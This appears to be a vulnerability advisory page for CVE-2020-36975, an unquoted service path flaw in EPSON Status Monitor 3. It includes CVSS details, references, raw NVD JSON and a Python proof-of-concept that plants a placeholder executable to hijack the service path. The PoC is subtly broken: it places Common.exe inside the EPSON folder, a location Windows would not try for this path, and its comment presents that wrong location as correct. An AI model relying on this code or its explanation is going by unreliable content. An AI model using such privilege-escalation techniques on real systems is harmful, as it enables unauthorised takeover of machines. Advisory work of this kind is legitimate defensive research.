Security Vulnerability Report
CVE-2020-36975 CVSS 7.8 HIGH

Published: 2026-01-27 19:16:10
Last Modified: 2026-04-15 00:35:42

Description

EPSON Status Monitor 3 version 8.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code by exploiting the service binary path. Attackers can leverage the unquoted path in 'C:\Program Files\Common Files\EPSON\EPW!3SSRP\E_S60RPB.EXE' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EPSON Status Monitor 3 < 8.0
EPSON Status Monitor 3 = 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2020-36975 PoC - EPSON Status Monitor 3 Unquoted Service Path
This PoC demonstrates the unquoted service path vulnerability in EPSON Status Monitor 3.
Note: This is for educational and authorized testing purposes only.
"""
import os
import sys
import subprocess
import ctypes


def check_vulnerability():
    """Check if the vulnerable service exists on the system."""
    vulnerable_path = r'C:\Program Files\Common Files\EPSON\EPW!3SSRP\E_S60RPB.EXE'

    # Check if the service exists
    try:
        result = subprocess.run(
            ['sc', 'query', 'EpsonRPCService'],
            capture_output=True,
            text=True
        )
        if 'FAILED' in result.stdout or 'FAILED' in result.stderr:
            print("[-] Target service not found on this system.")
            return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

    # Check if the vulnerable path exists
    if os.path.exists(os.path.dirname(vulnerable_path)):
        print(f"[+] Vulnerable service path directory exists: {os.path.dirname(vulnerable_path)}")
        return True
    return False


def create_artifact_payload(payload_path):
    """
    Create a malicious executable at the unquoted path location.
    In a real attack, this would be a reverse shell or other malicious code.
    """
    # The unquoted path allows execution of 'Common.exe' before 'E_S60RPB.EXE'
    malicious_path = r'C:\Program Files\Common Files\EPSON\Common.exe'
    try:
        # Create a benign file for demonstration (in real attack, this would be malicious)
        with open(malicious_path, 'w') as f:
            f.write("This would be malicious code in a real attack scenario.")
        print(f"[+] Payload artifact created at: {malicious_path}")
        print("[+] When the service restarts, it may execute this file instead of the legitimate binary.")
        return True
    except PermissionError:
        print("[-] Insufficient privileges to create file at the vulnerable path.")
        print("[-] This attack requires administrative privileges or specific file system permissions.")
        return False
    except Exception as e:
        print(f"[-] Error creating payload: {e}")
        return False


def main():
    print("=" * 60)
    print("CVE-2020-36975 PoC - EPSON Status Monitor 3 Unquoted Service Path")
    print("=" * 60)

    if not ctypes.windll.shell32.IsUserAnAdmin():
        print("[-] Warning: This PoC should be run with administrator privileges.")

    if check_vulnerability():
        print("[+] System appears to be vulnerable to CVE-2020-36975")
        create_artifact_payload(None)
    else:
        print("[-] System does not appear to be vulnerable or target service not found.")


if __name__ == '__main__':
    main()

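References

https://epson.com
https://www.exploit-db.com/exploits/49141
https://www.vulncheck.com/advisories/epson-status-monitor-epsonpmrpcv-unquoted-service-path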

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36975", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EPSON Status Monitor 3 version 8.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code by exploiting the service binary path. Attackers can leverage the unquoted path in 'C:\\Program Files\\Common Files\\EPSON\\EPW!3SSRP\\E_S60RPB.EXE' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "EPSON Status Monitor 3 versión 8.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario explotando la ruta del binario del servicio. Los atacantes pueden aprovechar la ruta sin comillas en 'C:\\Program Files\\Common Files\\EPSON\\EPW!3SSRP\\E_S60RPB.EXE' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://epson.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49141", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epson-status-monitor-epsonpmrpcv-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49141", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}